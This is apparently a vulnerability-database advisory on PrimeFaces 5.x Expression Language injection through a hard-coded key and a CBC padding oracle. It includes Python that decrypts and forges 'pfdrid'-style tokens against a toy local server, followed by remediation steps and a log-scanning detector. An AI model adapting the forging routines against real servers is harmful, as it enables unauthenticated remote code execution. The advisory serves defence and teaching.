PrimeFaces 5.x Expression Language injection - Vulnerability Database

PrimeFaces 5.x Expression Language injection

Description

PrimeFaces is an open-source User Interface (UI) component library for JavaServer Faces (JSF) applications. The 5.x releases contain two critical weaknesses in the way encrypted request parameters are protected; together they allow unauthenticated remote code execution:

  • Hard-coded Encryption Key (PrimeSecret): PrimeFaces encrypts sensitive request parameters, including "pfdrid" (the dynamic resource identifier used to serve dynamic content), with a passphrase that defaults to a value hard-coded in the library. Unless an application overrides it, this "secret" is public knowledge and identical across all installations, so anyone can encrypt a parameter the server will accept.
  • Padding Oracle Attack (PrimeOracle): the CBC-mode decryption applied to parameters such as "pfdrid" reveals, through its error behaviour, whether a submitted ciphertext has valid padding. That one bit per query is enough to decrypt existing values and to forge ciphertexts for chosen plaintexts without ever learning the key, so this weakness remains even after the default secret has been replaced.
A "pfdrid" value decrypts to an Expression Language (EL) expression that the server then evaluates. Using either weakness, an attacker can craft an encrypted parameter whose decrypted content is an EL expression of their choosing, and that expression executes on the server with the privileges of the application.
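The following is an added example, not code from this advisory or from the PrimeFaces project, showing why a padding oracle is as good as the key. It models the server side with a toy CBC/PKCS#7 scheme over a hypothetical 8-round Feistel block cipher (the real cipher does not matter to the attack, which only needs the one-bit valid/invalid padding answer), then recovers the plaintext of an issued "pfdrid"-style token and forges a token for a chosen EL expression without ever touching the key. It demonstrates the general padding-oracle decrypt-and-forge algorithm rather than one fixed case. All names here (DynamicContentHandler, issue, padding_ok, evaluate, the Feistel round function) are assumptions for the demonstration and are not PrimeFaces APIs.

```python
import hashlib, hmac, os
BLOCK = 8  # 64-bit blocks, the size of the DES-based scheme old PrimeFaces used

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, half, i):  # hypothetical keyed round function (toy cipher, not the real one)
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:BLOCK // 2]

def block_encrypt(key, block):  # 8-round Feistel network
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in range(8):
        left, right = right, _xor(left, _round(key, right, i))
    return left + right

def block_decrypt(key, block):  # the same rounds undone in reverse order
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in reversed(range(8)):
        left, right = _xor(right, _round(key, left, i)), left
    return left + right

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # this distinguishable failure is the oracle
    return data[:-n]

def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        out += _xor(block_decrypt(key, ciphertext[i:i + BLOCK]), prev)
        prev = ciphertext[i:i + BLOCK]
    return unpad(out)

class DynamicContentHandler:
    """Toy server: issues pfdrid-style tokens (iv || ciphertext) and fails visibly on bad padding."""
    def __init__(self, secret):
        self.key = hashlib.sha256(secret.encode()).digest()

    def issue(self, expression):
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, pad(expression.encode()))

    def padding_ok(self, token):  # the PrimeOracle leak, reduced to one bit
        try:
            cbc_decrypt(self.key, token[:BLOCK], token[BLOCK:])
            return True
        except ValueError:
            return False

    def evaluate(self, token):  # a real handler would evaluate the EL here
        return cbc_decrypt(self.key, token[:BLOCK], token[BLOCK:]).decode()

def recover_intermediate(oracle, block):
    """Recover D_k(block) byte by byte using nothing but the padding oracle."""
    inter = bytearray(BLOCK)
    for pos in reversed(range(BLOCK)):
        pad_val = BLOCK - pos
        for guess in range(256):
            # Known trailing bytes are forced to pad_val; the target byte is guessed.
            trial = bytearray([0] * pos + [guess] + [inter[j] ^ pad_val for j in range(pos + 1, BLOCK)])
            if not oracle(bytes(trial) + block):
                continue
            if pos == BLOCK - 1:  # rule out a hit caused by ...02 02, ...03 03 03 etc.
                trial[pos - 1] ^= 0xFF
                if not oracle(bytes(trial) + block):
                    continue
            inter[pos] = guess ^ pad_val
            break
    return bytes(inter)

def oracle_decrypt(oracle, token):
    """Decrypt a token without the key: each intermediate xor the previous block."""
    prev, plaintext = token[:BLOCK], b""
    for i in range(BLOCK, len(token), BLOCK):
        plaintext += _xor(recover_intermediate(oracle, token[i:i + BLOCK]), prev)
        prev = token[i:i + BLOCK]
    return unpad(plaintext)

def oracle_encrypt(oracle, plaintext):
    """Forge a token for a chosen plaintext, built backwards block by block."""
    padded = pad(plaintext)
    chain = [os.urandom(BLOCK)]  # any final ciphertext block will do
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        inter = recover_intermediate(oracle, chain[0])
        chain.insert(0, _xor(inter, padded[i:i + BLOCK]))
    return b"".join(chain)  # chain[0] has become the IV
```

With server = DynamicContentHandler("some-custom-secret"), oracle_decrypt(server.padding_ok, server.issue("#{bean.image}")) recovers the expression, and server.evaluate(oracle_encrypt(server.padding_ok, b"#{'forged'}")) shows the forged token being accepted as if the server had issued it. Neither routine ever sees the key, which is why replacing primefaces.SECRET on its own does not close PrimeOracle: the attack costs at most 256 queries per byte against any CBC scheme whose padding failure is distinguishable from other failures.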

Remediation

Take the following steps to remediate this vulnerability:

  1. Upgrade PrimeFaces: Update to PrimeFaces version 6.0 or later, which addresses both vulnerabilities. This is the recommended long-term solution.
  2. Apply the Official Patch: If immediate upgrade is not possible, apply the official fix available at the GitHub issue referenced in the Web references section (issue #1152).
  3. Configure a Custom Encryption Key: Replace the default passphrase with a strong secret that is unique to your application, generated by a cryptographically secure random generator and handled like any other credential (not committed to source control). Add the following to your web.xml configuration:
    <context-param>
        <param-name>primefaces.SECRET</param-name>
        <param-value>YOUR_STRONG_RANDOM_SECRET_HERE</param-value>
    </context-param>
    Note that a custom secret only removes the shared-key problem (PrimeSecret). The padding oracle (PrimeOracle) lets an attacker decrypt and forge parameters without knowing the secret, so this step is a hardening measure, not a substitute for step 1 or 2.
  4. Verify the Fix: After applying updates, confirm that the application rejects parameters encrypted under the default passphrase, and that a corrupted "pfdrid" (for example, one whose final byte has been changed) produces the same response as any other invalid value rather than a distinguishable decryption or padding error.
  5. Review Logs: Examine application and web server logs for exploitation attempts against PrimeFaces endpoints. Padding-oracle probing typically appears as a burst of requests from one client carrying many distinct "pfdrid" values, most of them answered with server errors; decryption or padding errors raised while handling request parameters in the application log likewise point to tampered values.
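As an added illustration of the log review step (not part of this advisory and not a PrimeFaces tool), the script below profiles access-log lines in the common/combined format and flags clients whose "pfdrid" traffic looks like padding-oracle probing: many distinct values from one client, most of them failing. The sample log lines are constructed for the example, the endpoint path in them is only sample data (the script keys on the pfdrid query parameter, not on the path), and the thresholds (16 distinct values, half the responses failing) are assumptions to tune for your own traffic.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Common/combined access-log format: client, identd, user, [time], "request", status, size...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "time": m["time"], "target": m["target"], "status": int(m["status"])}

def pfdrid_of(target):
    """Extract the pfdrid query parameter from a request target, if present."""
    values = parse_qs(urlsplit(target).query).get("pfdrid")
    return values[0] if values else None

def profile_clients(lines):
    """Per client: how many pfdrid requests, how many distinct values, how many failed."""
    stats = defaultdict(lambda: {"requests": 0, "distinct": set(), "errors": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        value = pfdrid_of(rec["target"])
        if value is None:
            continue  # only traffic that carries the encrypted parameter matters here
        s = stats[rec["ip"]]
        s["requests"] += 1
        s["distinct"].add(value)
        if rec["status"] >= 400:
            s["errors"] += 1
    return stats

def suspicious_clients(lines, min_distinct=16, min_error_ratio=0.5):
    """Clients that sent many distinct pfdrid values with mostly failing responses.
    A browser re-requests the few tokens the server issued and succeeds; a
    padding-oracle attack needs hundreds of fresh ciphertexts, most rejected."""
    flagged = []
    for ip, s in profile_clients(lines).items():
        if len(s["distinct"]) >= min_distinct and s["errors"] / s["requests"] >= min_error_ratio:
            flagged.append(ip)
    return sorted(flagged)

# Constructed sample log lines (not real traffic): one normal client fetching a
# dynamic image three times, and one client cycling through forged pfdrid values.
ENDPOINT = "/app/javax.faces.resource/dynamiccontent.properties.xhtml"  # sample path only
SAMPLE_LINES = [
    f'10.0.0.5 - - [10/Jan/2018:10:00:0{i} +0000] "GET {ENDPOINT}?ln=primefaces&pfdrid=QUJDRA%3D%3D&pfdrt=sc HTTP/1.1" 200 5120'
    for i in range(3)
] + [
    f'203.0.113.7 - - [10/Jan/2018:10:01:{i:02d} +0000] "GET {ENDPOINT}?ln=primefaces&pfdrid={i:08x}&pfdrt=sc HTTP/1.1" {500 if i % 10 else 200} 0'
    for i in range(40)
]

if __name__ == "__main__":
    for ip, s in profile_clients(SAMPLE_LINES).items():
        print(ip, "requests", s["requests"], "distinct", len(s["distinct"]), "errors", s["errors"])
    print("suspicious:", suspicious_clients(SAMPLE_LINES))
```

Feed it your real access log (one line per list element) and review the flagged clients by hand; a low-volume attacker can stay under the thresholds, so treat this as a first pass, not as proof of absence.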
